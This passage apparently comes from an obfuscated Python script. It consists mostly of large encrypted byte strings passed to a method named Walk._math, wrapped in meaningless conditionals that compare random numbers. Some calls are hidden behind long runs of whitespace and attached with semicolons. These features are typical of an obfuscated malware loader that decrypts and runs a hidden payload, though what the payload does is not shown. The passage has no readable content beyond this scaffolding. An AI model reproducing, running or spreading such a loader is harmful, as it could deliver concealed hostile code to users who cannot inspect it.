1a\x9eh\x87\xbd\xd7?.!$&\x80\xb8P\x8eOJ\xf4\x85\\\xb2\x8f\xde=2I\x80\xe0^\xda\x15\xea\x08-\xd4\x84\x08m\x9f\x80q\xfb`\x03Q=\x8bJ\xeb\xf1C\xb5z\xa9\xba5\xb8\xc0B\x17@\x12?\xc9\xb14k\xde\xb4:\xeb\x16\x91"\x0e \x11\x17\xe2\xda7\xe6{\xb1\x96\xc7\xb6\xbe\x0eK38\xcca\xb3\xca\x14\x16\x13\xc1\x17%7\x90\xb3\xe2\x85A\xef\xbc\xee&\xa0^dD\xd9\xf8\xca\x99^\xd4\xf5z\r\x04\x8f\xfeQ\xdf\x91\x0f\xb99\xd83\xc2\xd4v\x90\x15\x04\xee$\xb0g\xa5\xf5p\xc6\x88\x0e\xddD\x069d\xd7\xc0\xa6D\x98b\xc5\xd9m}\x93\x03\x14ZXb\x9cs\xe9{\xa1\xcf\x98\t\x88\xc7\x99h\x1c\xbc\x03\x1a\xbf\xd2\xf5\xc39\xb4\xa5I\x9c\xf6\x9d\xe2\xceK\x9f\xfdH\xcf\xb1U\x13\xc4\xc9\xe2\xc7\x98\xc3\x04\x03\xe3\x88\x94\x00\x8d\x1fRG!\xa5\'\xc0\xb0\xbe2\xa7\x83\x0e\xaeF%\xcf\xbd|\x02\x05@<(b4\xc1z \xb9z}\xac&ud\xf0\x862"\x85\xc5A\xdaF%\xf0\xe8\xb6\xbe\xceG\xb1\xa9\xd9\x1b\x99\xc8A\x18\x15\xa3\n\xa9\xe5\xe0\xaa\xeb+\xc5\xcb\xfaFV\x96\x10^\xe5\x1c.~\xc7A\x9cY\x0eL\x00\xe2\xe5\x80\x11\xbc\xb6\xa1\x00\xbb\xfa\xf6NHn\xaf\xbfE\x8a\x16nqb(Zh\x97\xfe\x93yM\x19\x92\xb9\x95\xdc+\x9e\x8aB\x89\x12\'\x12\xcdE\xdau1\xf3\xc7\xce\x01\xaaf\x07u\x83\x06\x8f\x90\xdb#\xc0\x9c^\x1f\xb9p\xa8Zf\xa5\xb5\x17\x11\'a-\x8ds\xb7\x16\xe0\xb4$\xe2\xb6\xf5m\x8a*\xa8\x85\x06s\x99\xc3\xcf\\\xf5\x90p\xc2\xcd\xf9R\x0e\x9cga\xa3\xd3E\x86\x8a\x1c\xd5>\xef\rH\xf6\xba\xbe\xed\x13\xa5}\xb67\xf1\x87\xe2\x8fl\xc1\x94\xd6\x93\xb1\xd8>%\xab\xe8\xa7\x90\x0c\xc1pe\x12\xb6$M\x0b\x1e\xbbM$\t\x1d\xf9L\xdd\xefa\xd81\xac\xb6\x1eV\xb1\x10\x92QIK\x92\xd7\xba\xdd\x9au\xbb\xfa\xb6\x89C\xb5\x07\x9e\xd82\xcevh\x16Q7\xf2\xbe\x132\xa9"\xaes\x7f\x87%h\x9f9z\x16P\xf3T\xfa(\xd4\xa5k\xac\x7fB\xb1\xb9\x112\x92\xa5\x9c\x9a\x01Q\xca\xa8\xda\xea@\x02\xbdr\x19\x89#\xca\xc7\xad2\x1a\x98t\x1c\x8b\xf5\xd5\x11\xd3A2\xf3\t\xe5\xebA2\xb5\xef\x03\x9e\x965\xa9T\x97\x83\x06\xb8yX(\x98\x05%~|("\xa6N\xbe\xef\xcf}\xc0Q\x03\xeex\x85\xdeb\xfd\xae\x83T/;\xa1\xcb\xfcI\xcbO\xc2\xfdf\x8ad\xca\x9d\\\xe0\xb1U0Sr{C\xe6\x95u`F8#\xc5\xddP\xe5\xaeX\x03\xcf~\xed&-\x0f\x89q\x0b\x80{_=+\x8b\xac\x91\x9f\x7f\xf5\x98\xdf\xbf\x9d}_g\xcf\xeb\x87\xa7\xb7\xeb\xfbo\xf9\xe3\xf3\xdb\xe5\xcbr\xfen\x95?\xdeO\x9f\xdf\xad\x1f\xbe}\x7f~\x97-\x1f\xde}{\\?\xc0\xeb\xe7w\x8f\xd3\x87\xdf\x97\xef\xf2o\xaaq\xf9\xb2~~\x03\xfdO~H]\xde\x17\xfe\xc7B\x00\xa7ox\x9f\x8f\xcb\xff\xf9}\xf9\xf4\xfc\xf4v\xfa\xf4\xf6\x91\xbe\xf6y}\xbf\x94\xaf|\xca\x96\xcbo\xd27\x7f\x82\xafX\xe4\xf7\xd4o1}^\xda}\xe1u\xfd;\xf0\xfa\xcdj\x9d-o\x9f\xf3?\x97\x0f\xb7\xcf\x8b\xa7s\xc4\x9b\xc9e\x1d\xd3#\xa2\xd1\xde\xcc\xffX\xce\xff\xa4\x9e\xe7\xf9\xd3\x87o\xd3\xe7?>\xa8cR?\xf4\xa4\xb8\x8f\xd37\x8b\xe5\xea\xed|z\xff\xf2}~2\xffs5{7\xbfW\x0f\xdf\xd7\x8b\xd3\xb37o\xdf\xfe\xb1\x9c.\x96\x8fO\xe7\xff[m\xbf\xcd1\xc26\xb9\xc8q\x03\xcb?O\xd4\xab3\xacH\x82\xc5HL]\x92w\xf0\x01p\xad\xc0\xca\x86\x0b\x9d\xe7\xe5\xe4a9\x83\x9a\xd1\xd6N0d\x97\xe3\x07\x00\xe8\x9c1\x7f\xfd\x1a\xb3\x9b\xcf\xb2\xb1\xe0\x82p\xd0\xc2+\xec\n=\x81\x87\x9dz\x02\x92d\xbd\xce\xd6\xeb3<\x06\xe8@\xbezt\xde\x83\xcf^}\xcd\xc5\xc5Yv\x87\x98j\x82S\xaf\x11a-_\x8cI\xd4\xf8\xd6\xdd\x1dU\x87WMg\x13<\x06\x8fVf\xfc\xa5\xea\x11?\xc2\x83BjBp\x8d\x88\x97\x97\xb3\t,\xe49}\xca\xe3:\xb3\xf4\x11}\xb52\x02\r\x8e\xcf\xecjsx\x93M\xec?F8\xc2\x18\xf9\x9c\x80\xc7\xe9\xeaL\xce\xf0\x03\xffq%\x1e\xeaM\'Hf9\xa2\xaa\xce\xa4R\x0fU\x8d\xe1\x9a=\xd4\x1f\x7f0\xfd|]xZ\xbd\xa4CFG\x18\xb8\xc5p\xd3\xd3G-\xa5\xaa\x8b\x1f<\xfbL7I\xa0\x04K\x89N\x12M\x99\x1f\xfc\t\xb5w\xca\xa2\xc6\xec\xa5+*\xdcL\x97\x139\xf5\x05\xf4\x0eW\x92\x9e\xce8\xef\x82K\xf3\xe9\x94\x0c\x1a_p\x82\xe1L\xd3\t\x87\x8b\x03\'\xff\x8c\xa7\xaa\x9e\xb7?\xde\xbd\xf9?\xaa\xffj\xfd\xb0\xb8Usiz\xfe\xf8\xe1\xf7\xe5\xf3\t\xd5\x8b\x06\xd0\x07&xC\xae\xb7:\xcf\xefd\xcc\xf3\xf3\xe9\x87\xe7\xe5\xcb\xb3\xfa\xf8\xdd\xf4\x7f\xe5j\xaa\x9f\xeb\xdd|x\xfa\x96\xad\x9fO\xac:H\xf8p\x7fz\x83?L\x9dG|\xcc\xe1\xe7}\xe5\xce<\xca\xa8,\x1b\x0e\xdf\xf5\xe9\xcd\x8b\\\x88\x1fRc\xe4+\xfc\xdc\xd9\xed\xe2\xf9\xe9\xf7\xca\xf7\xa1\xca\x08\xf3G\x8dn\x98B\xf9\xe9\xcdg\xe2\xf1\x14C\xf53\xbd\xfe"')

        if 203574 > 1367330:
            _substract._negative(_builtins = 92979 - _substract.Add)
        elif 173802 < 7309675:
            Walk(_calculate = -27053 / -63676).Calculate(System = _substract.Add / 92117)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='xxwwwxwwwwxwxwwxxwwxwwxxx',_invert=b'_JCT.\x16_\x8a\xd3\x1b\x94\x18c\x06\xb0\xd2\xb0\x81\xef]+y\xa0d\xc0\xf9\xb9\x8c%~\x9b\x16\x8dq\x06r\xe1-\x8b\x8c\xf3{\x82P\xdf\xf3H\xd4\x03\xcd\xde\xcf\x8b\x0c\x81\x1f\xfa\xba\xc0\x7fa?\x99\xf9\x8e\xb1\xcct{\x1fp\xacJj@\x0c\x0e\xa3p\x10\x96\xcb/\n\xbb`J\xd3\xcfBj\x8a&;l\xd9\xfbA\xa9\x82\x12\x03g\xbc\x12\x18\xf6.t\xc8\x83&!>\xdb\x9f\x06R\x80+\x06\n]\x8d\x89\x11\xa3\xb0\x83kZ\xd5`\x11\xc3\x05\x0e\x9fJ\xe7\x94\xe1\x8e,\x05\xc6\xe3\r\xe7A\x9f\x8a\xacp\x12>q\xe9V\x9c\x0f\x12\x99\xf9T\xf8<\xfel\xa9\xeaj\x8a\xbc\x16.\xc7\x8bUo\x9e.Fa\x17w\x88\xd0\xcb\x0c\xbb\x04\x9e.{\x0f\xd7\x82>\xf3\xad5\xdb\xbf.\xfe\x10\xfe\x95"\xd8\xe07\xa9\xf7q\xfa\xe1j\x827\x12\xce(\xa0\x11\xb7\x81\xcfg\xb4\x8bw\xba\x17\x7f\x81\xaf\xcf\xa9\xda8SK\x94\xe91\x96\x9aC4V\xf1\xd5\x19O \xd3\xeb\xde\x8cV\x82\xfe?<\x9c\xf1\xac&\t\xf1\xb8|\xfa\x96?<-\x95\x80\xf8\x96?=\x9f\xb4UZ6e)n\x87\xbb(K2\x86,E\xce\x9d\x0bDG\xa7\xbcE\xd4\xdeE\x8b\xc7\x02\xb7\xa8\x0c\xa5\x94\xd1\x98\xf8\x98\x97\x88\xa5o\x93&\x81\x90\xb2h{\x87W\x03\x1eH\rx\xfac\xfa\xb8$-`\xa3\x02\xa0\x96I\xa8/\x80\xe3\x83D\x18.\xb7\x1b\x85+\x16Y\xc7\xfa\xea\xb8tz\xf4\x98{\xad\xc5+\xce\xb3K-\xa2a\x9b\x04\x9eLu\xa23\xfe,\xc2\x8e\x8b\xb40];>d(eId\\\xa0\xc6\x01A\xfd|\x9b\x90E1\x01\xcc*@\xfeN\x9b\xb0\xc7\xd3\x1b\x11r\x9cI\x82\xc3I\xbe\xfa\x82\x84\x14\xc9\'\x1c\xda \xafNo.\x990G\xb8s\x94\xdc\x80\xef\xfe\xfe\xb4|\xbc]/6|7.\x10\x04\x94\x85#8\xbd\xf9$\x81X\x99J\xb0)_{uIj\x02.\xa7\x97$\x95\xae\xc6\xac\xdc\xebq\x0bc\x14\xbf\xf5q\xcd\x97\xe8\x00\xa3\xbb\xcb\xe8<\xfd\xf0\xfd\x11\xc4\xdf|\xce\xbfW\xfd\xf2\xda\xd1\xb3\\\xfeu>\x9f\xeb\x13ry\xa5\xb3\xa3Qf\x9f\xde\xe4\xa4\xcd\x90J\x88\xd0\xb0\x89\x9c?\x14cr\x0e\xae\xb5\xd8V\xcb\xb8hB9\x0f\xde\t\x8e\x19-\xc3\xe8\x94\x8f\xf1\xcb@\x97\xe0\xaf\xb3\x05\x0f\xeb\xe5\xb2\xd4\xa2\x9022G\x89\xb6kr\x94\xb2\xb7\x94\xd6\x8e3R\x8e\x90\xbb\x13\x94\x12\xfc\n\xe8-0\x14\x18\xc09\xad\x85\x93\xb3\x8c+\xbb\xde\xa1F\x8b\x95\x9fX\xad\x9d\xd0/\x17\r\x16\x0ef\x92\x9f\xd1\xfbX*\x84\xe61t}\xb1\xb4%\xd4\xd6D\xbeJ\xbb\xb6}~\x9c\xd1\x80\xa0_\xab\xc7\x17\x1f\x8c\xd5\xcewxyf\xd639\x1b\xa4\xc6[\xb3\xe8A\xb6q\x86\x9dq\xa5C\x99k\xea\x91\xfb\xb3\x0c\x97\x0f\xdd\xdf\x9f\x99n\xf7\xfc\xfe+\ts\xaa\xee%\x89\xb1\x90\xbe\x8eD\xc7^@\xad \xec\xe7q\x88u\x87\xa0\xe8\x0b<+\x81\x0f\xd5\xdd#\x0f\xab\x0f-\x10\xb4\x97\xc6\xcbx\x16\x80_,&\x9e\x00\xe8\x8d\xef\x00}r\x82\xe5bF\\?%\x12\xb7\r\xf5\x8f)}|\x84\xb8\xa7$F\xb7N<\xa3(\xba\xb2\x9cc\x0c\xaf\xc5\x98\xf6\x1e\xa9o\x8c!\xe9\x1d\xb9$\xa1\x0e\x99j\x0f\x9a \xa5v-#\xab<\xcb\xf2\x1f\xf5\xeb\xc8\x17![!\xf5\x8c\xd5\xd6mK\t\x19a\x13\x84a\x81\xa2\xdfz\x11\x91\x92\xa5b>=\xa0\x9a.C\xf5Z\xabm\xbe/B\x01\x96-\xf4\xcbN\x08\x1c\x00\x86\x86\xd2\xb4\x1f,=\x9fm^x\xdc\xb6\x94\xbcH\xf9@Q\xbfi\x1a\x9d\xdeh\xbbH\xcf\xbd\x17\xf9v\xe6\xe8\xff,\xc44\x9f\xbf\xc0\x9a\x87\xa7\x8a\xd7=\xcdY\xf3y\xdbRB\xacU\xb8\xe6\x90L\x01Qh\xdc\x18l\x17\xc8\xb7\x8a\x11\'\xaa\xf3\x17\x89}\xa1E\x83g\x04\xaf\xc2\x04\x85\xc9W\x16\xbb\x95\xe5\x0b\xed\x9b5\x99\xe7 _No\xf4\xfa\x89K\xe9\x1dJ\xac\xbb\xaf\xc6\x9e\xa1\xfd\xd2\xaes\x16\xb8x\xba5\x9a\x17\xedxX]\xc1\xec\xb9(Ha\xd6\x11\xf9bj\tN\xd7\xb4\xa8&~\xd4\x8b\xa8.\xf6N\xd6wUWd\xe7\xc6\x84\x0c\x0fx\xb6\xc56\xdd\xc0 \xc1\x0e\xe0i@G>v\x9e\x9c\xf1\xe5\xa8Q*}\x11B\xd7b,\xec\x9aQ\xf3\xfbg=\x9d\xde=,\xd4\xcb\xca\xa4\xba \xbb\x88\x16\x08>[\xf5SJ\x1c\x16z\x0c\xb0\xdc\xff\xd1zf\x19\xe3\xder\n(\xe3\x12\x19\xa8\x91~\x9a\x98\xd4\xd0\x89\xa1W\\s\xb1X\xa7Ww\xba\xdax\x1aQmD\xf7\xc9d\xab\x96\x86\x066\x8e\x18\x1e2`s\xd3~\xd0\x1b@k\x1f\xee\xd33\xfaa&&//\xcb \x08\xe8J\xf0\xca\x80\xb7m\xd3*G\xd7\x12y\xc3\xf0t\xc3\xc3\xe9\rU\x07D\x15\x19}X0\xd2\xe5kq\xfe]\xe1l\x84\x14\x13\xd4NP\x1b\x04\xe5\xee\xa3Q\xech|\xfe\x94\x8a\xda\xd3s\xfe\xf8\xf7\xedj\xa6N\x98\xfa\xedr\xaaP\xe9&\x85\x1b\x1cah\xe1\x9d\xde|1\x92\x86uxx\x92\x93%\xf6\xad\xccO\xb6{\xf1B\xd9W\x89g\x11J\xa2\xe9_\xd6\xb7\xa2ci\x8c\xda\x19=\xd17\xca\xcaCR\xd4\xb8G^\xb4\xea\xf3\x83D\xf3\x1a}\x8a\x19\xb9\x013\xda\xce\nR\xc7\xf6\xb8|\x96\xd5\xec\x0c\xe7&\x08\x08q\x1f\x90\x83\x8f<\t\xf0\xe2\x0c\'\x02\x0c\x05\x1a\x04z,\xa0\xfe$W\xf3\xda\xd2D\xcf\x1e\xb4g\x95U%\xd8\x82\xee\xf7\xd6\x12DJ\x13ZJ$\xe7A\x15\xbd\xe4\xb9g\xef]\xabe\xa0g\xd2\x82J\xcb\xdc\xc48\xac\xd4\xd4#u\xce\xd7\xcb\xe3\xb5\x96W\xb6\xa8\xe4rsw\xa4N\x82\xbf\xd4Vm\xad)\xc5\xc3s\x87`<\x88\x82VJ\x1e\xd2*\x9a\xb2\xb6\x83\xe2{\xca\xe6F\x95\x0b+_\x02\x83U\xdc\xd0"g\x95,I\x89)\x87\'VQ\xf9\x1a\xa2\xf2\xd5]\xd9\xba\xcb\xd7\x0f\xbf?n1\xda\xd18 \x079\xae\xc6\xd9\xc6U\x81\xc3\x18,n\xf4%\xe3+\xd8zU0.4\x19\xfe\xeaA\xe9\x01\x98\xf1\xb9\xce\xd8\xbdK\xaev=\xe9\xc5\xaf\xf5I\xcf\x19%\xca\xd1t!\xa0&=\xe5(\xe6so\xdb\xba`,\x8fk{,\xa9%\x06c\x0f\x18x\xb8\xc0\xb8;\x07\x08\xbe\xea\xdfm\x9c\xf04}AM3\x92\x81\x1d\x99\xdb\xd6\x06N\x17\xc8ym\xb8\xe0\x7f\x90y_D\xb7\xd2\xeeIu\x93\xaf\xd6\xde\x84{\xb6m\xf0\t\xadx_\xe6\xa0\x16\r\xd8\xb4A\x0b\xa2\xdb\x17\xa9\xef$\xfa"\x0b\xdb\xcff\xfe\x15?\xc0\xe6\xe4\x84\'?\xebz\x9eW\xd7\xdf\xf2\xaf\xeb\xb3\x82\xffU=\x8a\xbf\x00WdO\xc0\xb6\xa4[\xe3\x12_\xd5\xaa\xe8&y\xe1b2fg\xc6c)\xb5\xb8Q\xf1(\x7fP\x0cF+*u\x7f& v\xb9\xbe\xf4\xff\xb1\xfc\xd9\x17\xd6\x8b$\xa0\xc3~\xd23\x8aG\x90\xeb\xebnM|<w\xbf\xf1\xc9\xf9\r\xd5\x96\t\x9e7\xd48P\x1d\xf8MM\xc6\xdfD^\xeb@\r\xfe\xb4\xf2\xb7\xe2\x08\xc9I\x9b\xb8 \xe7\xfedr\xc6\x92\x1b<\x00cLO\xe5H\x89u\xbb\xd0yn\xac|*%\xd5\xf8\xe9\xd9\xad\x9fm\x16\xb6\x0f\xc6\x8c\xe6\xa0\x10[F\xbb\x04N\xb6\xfes\xf9m\xfa\xfb\x16?\xa1\xae+f\xec;\xb8\xd5k\xa3\xda\xfba\xec0\xd8n-u4RO\x80{\x9f\xc1t\xb1<\xe1\x1f\xb5X2\xda\xa0\x90\x0f\xd8a\x10\x98uZCg\xf7\xd0Vyc\x1cm,1\xafQ\x9f\xf5r\xd6giLx\x14\r\xf5\xb4\xe7i2\xe1\x98\x95GS\x82\xa3\xa4\x9e\xb2|\xb4\xaf\x9a\x9c\x1f\x0fdc\xd6*\xa4\xa8\x91R\x9c\x13\xbd\x8e\x13\xdc\x05_\xd6\x07-P\xe4\x8b\xc7\xd6\x00\x19s\\U\x9d)\x13;\xf8$\x91I|\xaaH\x9aL\x92\xf7\xb9\xee,\xaa\x00ei\xc1W_<\xb4\xa4\x80\x95;M\xc8j\x9a\x90F\x9d\xa3\xb1\x07\xb3\xa1,IH\x8f$\x13\x87\x03`y^\x11\x1ex\x1e&\x1c\x1f"\xa1\x06b\xf8L\xc2\xb3\x1c\xfb\x02CG>\xa2}\xc8\xd6\xc0\xc1\xcd3\xf9\xfd\xac\xa4B?\xfd\xabI\x9d\x9dP\x1c\n\'\xe0\x19\x06\x953\\\xdd\xee\xf8\xa4\x80\xb0@A\x90\x8d\xed?\t\xd7k\tr\x85\xc6\xd2\x18\xb5BN?\xd7\xbf\x8f\x82\x19\xda\x81(\x01\xb2\xb3;\xf2\xf7\xa1\xf3/\xc3+\xc1\xb1lsTZ\xe3\xe59\x08+@~A\xd6\n\xf9\x10\xd1\x82\x85\x01\xb3YH\xac\x99|,\xe3\xd8\xf8\x1a\x03\xb4\xeb\x8a\x1b\xd6\x96\x11\x10%\xb2\xd0\x07\xe7\x12Z\xc5\xe8*I4\x8c\x99\xfd\xf8c\x9d-\xdf\xca\xd4\xcb2\x11\\\x14E\xc2\x0f\x03\xc6\x01\x81\x1aZ7\xd0&\xc1)\xf5z\x86.{\x1bI\x95\xd4\xe4=\x19%\x81i\x91\xda\x80\xd1\xb2-\x8b\xe4nh\xd2\xe9\x87\xbb\xa7\xfc\xe1\x84\x8eY\x9d_Q\x03\xc4\xadod\xe7\xdb\xf5\x03\x9d\x943\x1e\t\x0f\xd3\xfb\xe59\xb6\xdcd\x1a\x1d\xa0\x97\x86l\xfc\xf5F\x07me-\xf8\xca\x1f}\xf9\xce\x1f\x14\x9d)\xe7\x08,\x8c\x99\xaf\xb8;\x1a{\x04\x9e\xc8\xee\xe4\x83\xf9\xd3\x87\xa7\xbf\x9f\x9e\x97\xf7\'lc\x0b\xecH(\x92\xc6\xa7\xdc\x13\xb17\'Z\x10\x89s\x18\x84Q\xa1\xc7>\xd76\x9aEL\xb2\x8a\x1c\x93\xcc\x96\x90,"\xe01\x9c\x85pM\x95V\x0f\xefAEMlop%\n?\x0be\x8cG\xfa\xe8\x84\xe47l\xff:\x990\xd6\x05\xf5@\x8f\xdf\x03\x17\x01\x7f\\\x8fn\x00\x1b\x95\x109\xefX\xef\xe1\x13\x07\xfe\x89\x0f?\x1e\xd7\xcf\xcb\x13\xf9\x94\xece\xf6\xb8\x9c\xfe\x89\xdb\xcb\xeciyV\xf8i\xe2\xde\xd2\xca,\xfc\xc9\x07\x11\x95t\xf2\xe5\xb3\xf8\x105\xc0\x9d$\xc6\xe9\xa6\xeb\xa8\xf17\xbcf\xd0\x8b\xeatG\x01\x98\xe9\xe8\xb1\x92\x19f\xb2k5\xc8\x00\x85\xe0\x81g\xfc\xe3\xdfg\x8dN\x0f\x1a\xf6\xe8:\x193m\xc7\xe5\xe5\xe9\x07u.\x16\'\xfa\xfc\xfe\x03\xe5\x02J\x86;\xae\x04\x81\xf0&t_T$BA&\xe4\xac<\xa2\xea0a/\xe6')

        if 386362 > 3899351:
            Walk(_calculate = 68331 + -23921)._negative(_builtins = 54136 / _substract.Add)
        elif 135536 < 1063532:
            Walk(_calculate = 63667 / -93148)._negative(_builtins = -33656 * _substract.Add)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='SSS2222S2SSS2S2SSS2S2SSS',_invert=b'WT\\<\x03\xaa! \xd3W\xbd\x03-\x19\xeeEK\x91\xb8\xcc\xd7\x1bTT)\x1aF\xf0\x1e\x8c{\x9a\xcf\x9aAE\xb6\xc6$\'\xf7/\xce\xa1S\xdd\xedH\xe7\xbdZ\x8e\xe7\xcf\x7f\xf2\xa2\xc4:\xd5\x83\x1e\xd3\xf7\xa6\x9b\xba\x16\xd8\xf3\x1c\x9d<\xec\x84\'5\xde\\\x08{\n\x97\xa7\xf1\x86E\xd0\x02\x7f\x081\xed\xa7S\xbb\xfb?r\xd4\xf3\xd96\x01\x13\xad\xed|\xfe\xbca\xf0\x97&\x00\x17u\xbf\xe3\xb5L-b7\x14\xaaG\xd7\xdc\x95 \xf0\xc6\xe3\xaf\x85=\xe8\x19 \x18\x87\x9ca\x0e9\x19\xd2\x80\xf8\xbay\xd1F2G}\x18\x0c\xf7\xa3\xb8/3#\x08\xf2\x88 D\x8a\xff\xdf\x91\xbb\xe4\xb4\xd0\x9f\xa6\xc6\x17\x93\x99$^\x85M\xdd\x8ep\x06Y?\xce\xb854\x88H\xdd~E\xb8\xe3%\x87\xd4M\x19\xcb\xf1Uq\'[\x97\t}lZ9\xc2\xed\xba\xb5t\xd3t\xacNH\xf9\xe1\x1a`(\x97\xf4\xe5\xb4\xe6\x92\xees\xfe\x91A\xd1\xf3\x17\xe0pD\x0en\x9eK\xf6\xec\xc1\xed\xc63\xa6\xf0\xe3h\xf5\xd7\x11t\x1d\x17\xe5\xad\xba#1\xc12\x96?\xd4q\xf92_~{>\xab\xa8\x0ch\xee"|t\xc2 M\x98$\x15\x05\x88$\x9b\xd1)x\xeb\x1f\xbf\x90\xff\x10\x9c\xad8\xd7h\xb4m_\xcd\x11\x1f\xc5^\xa31!GPO\xd7\x90\x0b\r\x16\x07\xb5r\xc3z\xceRJ\x07\x07\x95\xa8\xba\x99p\x00|\x82W\x12\xb5\x81\x8d\xabyN\x11s\xf4v\xa0\xda[^\xccu\xd9y\x13\x86\xf9\t\xd6{\x91T\x05\t%\x86\xd7\xaf\x86KXkA\xe4\xac1;\xd8*\xa5^,\xe72n\xd4\xcb\'[6\x15\xe5\x92XQ\x96\xcf/\xb3\xe6\x90\xccx\xc19\\\xdb\x87\x01\x0f\xa7\x1b.\xa7@\xbb\x8d{\x97=\'\xa7o\xb6\x1eP\xa6\xbf_\xec=\xad\x9ag\xeb\xa7\xe7\xdb\xf9\x9f\xe77_\xdf\xa8Gm#\x11\xf3\xc2\x84\xf0\xf5\xe0\x81~#\xc6\x82\x81\xb8\x13\xce\xe7\x8d\xfd\x03_\xcc\x82*\xd1g\xfc\xbdp0S\x16+{\x0c\xa7\x84\x8b\x96\x04\xa3\x80\x8a!\xa4\x01\x8a`@\xda,\xfd\x11\xa0s \xbc\x83\x94Z3?\xa5\x92\x05\x98\xe63\x0b\xd30\x8a\x16\xd1\\\t\xe7Y\x18"Q\xfe\x14\x98\t\xa1l\x01\x94%\x18\xcdU\xdf(\\\xaaWQ\xe4SO\xf5>\x95D\x99G^qO\xf4)\xdc\xcb\x08\x7f\x01\xe0x\x9a\x04\x8c\xe0\x04(\x012=?\xd7x\x17\xdb\x03(\xe6\x96\x0c\xa7"\xc0S\xb2\x13\x0c)+\x1a\xefgS\xf2\xdb\xceX\x14\x13\x98Q\xf2\x12`y\xde\xec\xab5NV\xb1gi\xb7\x82\xa31\x96 Y\x11 X\x9e\xd5HR_\xb4\x9aiP%\xf9\xc7\x11g\x81\xd6\n\xba\xdd\x10\x9d\'\xb1K\\^&9\xbb\xdes;\x8c\xac=\xff\x9a\xd0\x06\x03\xc9\xf2\x83\x8a\xe2P\x9d7\xfe\xfas\xb2aP\x8c"\x8cA\x1d1\x9d86\xfd=\x96u8\x86\xd9\xed\xafF2\x9c}3;\xd7\x8b\xf9\x1f\xe7\x85\xa0\xd4\xb5\xcc=\x0e\xea0\xf6@\xcfH+\xd6c\x8e\x82#\x16\xe6p\xd0)\xabN\xa2Y\xbb\xd9\nc\xe7\xcd\xfc\x0f}\xa9\xf6\x99\x03\xc7Wh\xa5\xb5\x8b\xcc\xb8K\xb5\xf7\t\x06!\xac\x9fpr\xaa\xfa\x8ax\xd3\x04\x8e\x02\x80\x94\x1e|Pm\xab\xae\xd0\xaae\x9f,i)\xd6^i\xb5\x8a\xb1\xe4\xfd0\xfd\xa6$\xf6\xe2d*\xedJ\x0c\xcf\xff\xfcM\xe2a\x9f>\x19\xb4\x05\xfc\xd7x\x96\x18\xaba\xfcEE\xaf\xd2\x15A\x0f\xc6\xe8\x04\x18sz\xcd\xe9\x1b.NDh\x0c\xf2\x04\xa3Y<~\xf3\x94\x9d\x83\x99\xb3\xd6\x16\x18`\xc7\xde\x98\x0b#\x01L\x93\xd8\xc2\xaa\x83\\\x16\xdf\xba(\x12<\x82\xb5Y\x8c#\xcbL\x92\x0f\xbdH\xfa\x83\xc9a\x92\xb7t\xc8N\x1b\xf60\xaf\xe4]=\tmi\x02\x8e5^\x83\xb5\xe3N\xe7a\xc1\xb6\xbc\xadQ}\xe2z\xd3\x9f\xcbLR\x08y\xd6~\xc5D\xa8;\r\xeb\xe5J \xb4\x8a^\xe63XEW\xf9\xe3\xdb\xc7\xc5\xc3_\xcfjT\xdfHv\r\xaf\xd4\xea\xf0\xdeM<\x06A\x11x\x92\x12\xf1&\xefd\xb8\x1a\xa4\x1c\x9c\xbfwkJ\x89\xb9\xa3g\xc4u\xbc\x93\xb0\xa0Vk\xf0\xf1\xddK\x01\xef\xc5\xfa\xc1\xbbk\x13g\xf7\xe52\xf8_a\xf0\xdc\xa9\xdf\xab]\x18\xec\x8c\xfc\xa4\xd3\xba>PJ\xe6\t\x1e\x8a,_\xf0\x91s\r\xb3\xe7\xb5\x02\xeeo\xd5A\xe3\x9b\x18\xc1\xc7h\xd7\x84\xe2B\x9c\r\xc4\'H\x06;\xed\xf5\xcdb\x99M\xff>\x87s\xcd\x16\x078\xa7$\xb6z\xc5\xf5\xb3\xae\xd4\xb7?<X\xbd\xae\xf5\x11\x89\t\xc9\xcf\xaa\xe3s\xb1\xe7>\xd2!P\xa23\xc2\xc5}\xa9\x84\xddBK\x859V\xdeI\xb0Z\xdal\x94\xd2\xaby<\x1d\xc6\xb0\x8d\xa2Xj\xf3\x00K\x18\xca\x96\x04\xb7\xfd$\x85\xbc\xed\x06\xe9\xf4\xea@\xff:\xd7\xd8s\x81z\xd0\xb0`\r\x8c&\xe9\xe5X@\xa4\xe4\xba\xda\xaa\xfe\x1184g\xc8\xb9\xf6\xecy\x9e\xe5\xa0\x85a\xfb\xc7\xf4\x0f\x10\xc5\x98q{\x92\xa9\xfd\xb0\x88:=\xad8\x83!j|\xceo\xdf\xa8\xcf}\xdd`v\x1a\xddx\xf1p\xfeQgRJ4\xf3\r\x89\xa7\xec\xdc\xce#4n4|\x9b\x0eY\x8c\xad\x1f\xc6\xf2z\x91/Q\xa3R\xed\xfd\\/\xb7\x16*\xcbrc\x97U\xf5\xa2~\x057]k\xd2$\xab\x91Md\x02\xe4p\xd3+\xb8\xcc6\x93b\n\xbfo\xab\xc2\xc5\x89\xaf\x94\x87B(\x015W \x14\xce\x00C\x8d\xa9\xc3X\xb8\x18\xdb%\xcd\xab\xe0o\xd43\xf7\xf4\x06\x03\x95WcBx\xa2\xb9i\x80\x9d\xbeVa\x04:\x06\xa8\x9b\xd2\x81\xaa\x17_\xcdI\x15\x8d\x0b\x15;\x9a\xd2\x04\xcd\xc1 o\xd9\xcc\xd1>\x17-\x82\xde\xa9i~\xaec\x1dFU\xdal:\xad\x17\xab\x99R\xca\xe0T\x0bF\x9a\x8e\x01\xb1sc\xda\xbc\x02\x05\xd5\xb8wIO\xfdjN.\x83-\x18\xb3\xa1t\xd1;N^\xe5;z\xdf1R*\xc7y\xbc\x1a\x19\x00\xd4\x0e\xa2\x95\x89\x86\xa0\x13\xb9u&4.\x91\xf6E\xd6 